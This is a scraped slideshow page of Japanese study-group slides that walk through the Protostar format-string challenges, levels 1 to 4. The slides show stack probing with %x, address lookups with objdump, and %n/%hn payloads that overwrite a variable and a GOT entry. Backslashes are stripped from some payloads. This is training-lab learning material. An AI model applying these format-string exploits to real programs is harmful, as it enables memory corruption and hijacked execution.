Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Tachikoma 2013-01

  • Login to see the comments

Tachikoma 2013-01

  1. 1. Tachikoma JanuaryMonday, January 28, 13
  2. 2. おしながき • Fusion lv.02, 03, 04 • 5 minutes pythonMonday, January 28, 13
  3. 3. Monday, January 28, 13
  4. 4. WTF!?Monday, January 28, 13
  5. 5. おしながき • Fusion lv.02, 03, 04 • 5 minutes pythonMonday, January 28, 13
  6. 6. おしながき • Protostar format lv.01, 02, 03, 04 • 5 minutes pythonMonday, January 28, 13
  7. 7. おしながき • Protostar format lv.01, 02, 03, 04 • 多めにやるから許してください… • 5 minutes python • import “大学の課題”Monday, January 28, 13
  8. 8. Protostar format 1Monday, January 28, 13
  9. 9. Protostar format 1 • int targetを書き換えればok • C言語だとグローバル変数は0で初期化 • 目標:なんでもいいから0以外にするMonday, January 28, 13
  10. 10. Protostar format 1 • argv[1] を色々変えてあげればいいっぽい • どのへんまでpopすると出てくるか探す • int だから4byte • AAAA%x.... • 手でやっても見つからない…Monday, January 28, 13
  11. 11. Protostar format 1Monday, January 28, 13
  12. 12. Protostar format 1 • 132くらい? • printf(“AAAA%132%x”, <-と同じ); • ってなるっぽい?Monday, January 28, 13
  13. 13. Protostar format 1 • %nを使って適当に書き換えよう • ./format1 `python -c print "x38x96x04x08xx%132$n"` • 8xxyou have modified the target :)Monday, January 28, 13
  14. 14. Protostar format 2Monday, January 28, 13
  15. 15. Protostar format 2 • 変更点 • argvからじゃなくてstdin • targetを64にしないといけないらしいMonday, January 28, 13
  16. 16. Protostar format 2 • 1と同様にpopして探すよ • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2 • AAAA200,b7fd8420,bffff564,41414141 • target is 0 :( • 今度は4つでいいみたいMonday, January 28, 13
  17. 17. Protostar format 2 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target • 080496e4 g O .bss 00000004 target • 1と同じ感じで試してみる • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08%4$n" | ./format2 • ? • target is 4 :(Monday, January 28, 13
  18. 18. Protostar format 2 • target=4になった! • %nは書き換わった文字数だよね! • 試してみる • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08x%4$n" | ./format2 • x • target is 5 :(Monday, January 28, 13
  19. 19. Protostar format 2 • もっかい試してみる • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08xx%4$n" | ./format2 • xx • target is 6 :( • 64-4=60 だし… • user@protostar:/opt/protostar/bin$ python -c print "xe4x96x04x08"+ "x"*60 +"%4$n" | ./format2 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx • you have modified the target :)Monday, January 28, 13
  20. 20. Protostar format 3Monday, January 28, 13
  21. 21. Protostar format 3 • 変更点 • 直にprintf()じゃなくてprintbuffer(char *)をカマせてる • たくさん書き換えないといけないMonday, January 28, 13
  22. 22. Protostar format 3 • とりあえず同じようにしてみる • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3 • AAAAxx0,bffff520,b7fd7ff4,0 • target is 00000000 :(Monday, January 28, 13
  23. 23. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c print "AAAA"+",%x"*16 | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :(Monday, January 28, 13
  24. 24. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c print "AAAA"+",%x"*16 | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :(Monday, January 28, 13
  25. 25. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c print "AAAA"+",%x"*16 | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( • 12個目でしたMonday, January 28, 13
  26. 26. Protostar format 3 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target • 080496f4 g O .bss 00000004 targetMonday, January 28, 13
  27. 27. Protostar format 3 • 試してみる • python -c print "xf4x96x04x08" + "x"*256 + "%12$n" | ./format3 • xxxxxxxxxxxxxxxxxxxxx(ry • target is 00000104 :( • 動かないMonday, January 28, 13
  28. 28. Protostar format 3 • マルチバイトや! • 各バイトごとに同じように計算してあげれば!Monday, January 28, 13
  29. 29. • 試してみる • python -c print "xf4x96x04x08xf5x96x04x08xf6x96x04x08%12$n %13$n%14$n" | ./format3 • ? • target is 000c0c0c :(Monday, January 28, 13
  30. 30. • 色々足してみる • python -c print "xf4x96x04x08xf5x96x04x08xf6x96x04x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n" | ./format3 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxx(ry • you have modified the target :)Monday, January 28, 13
  31. 31. Protostar format 4Monday, January 28, 13
  32. 32. Protostar format 4 • 変更点 • targetじゃなくてGOTを書き換える • 目標 • call hello()Monday, January 28, 13
  33. 33. Protostar format 4 • helloのアドレス • # objdump -d ./format4 | grep hello [/opt/protostar/bin] • 080484b4 <hello>:Monday, January 28, 13
  34. 34. Protostar format 4 • pop, pop, pop... • python -c "print AAAA + ,%x*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141Monday, January 28, 13
  35. 35. Protostar format 4 • pop, pop, pop... • python -c "print AAAA + ,%x*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141Monday, January 28, 13
  36. 36. Protostar format 4 • pop, pop, pop... • python -c "print AAAA + ,%x*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 • 4番目でしたMonday, January 28, 13
  37. 37. Protostar format 4 • 方向性 • exit()を呼ぼうとしたら、hello()が呼ばれるようにしようMonday, January 28, 13
  38. 38. Protostar format 4 • objdump -R ./format4 |grep exit • 08049718 R_386_JUMP_SLOT _exit • 08049724 R_386_JUMP_SLOT exitMonday, January 28, 13
  39. 39. Protostar format 4 • 0x08049724をhello()に書き換えればいいから… • python -c print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn" | ./format4 • [1] 4950 done python -c | • 4951 segmentation fault ./format4 • もしかして:入力長すぎMonday, January 28, 13
  40. 40. Protostar format 4 • Google(“help me”); • %nd(nは任意の整数)ってやると0埋めできるでしょ • 普通はnbyte埋めたいときはこうやるらしい…Monday, January 28, 13
  41. 41. Protostar format 4 • もう一回試す • python -c print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn" | ./format4 • $ %xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx(ry • code execution redirected! you winMonday, January 28, 13
  42. 42. Protostar format 4 • なんか動いた。Monday, January 28, 13

×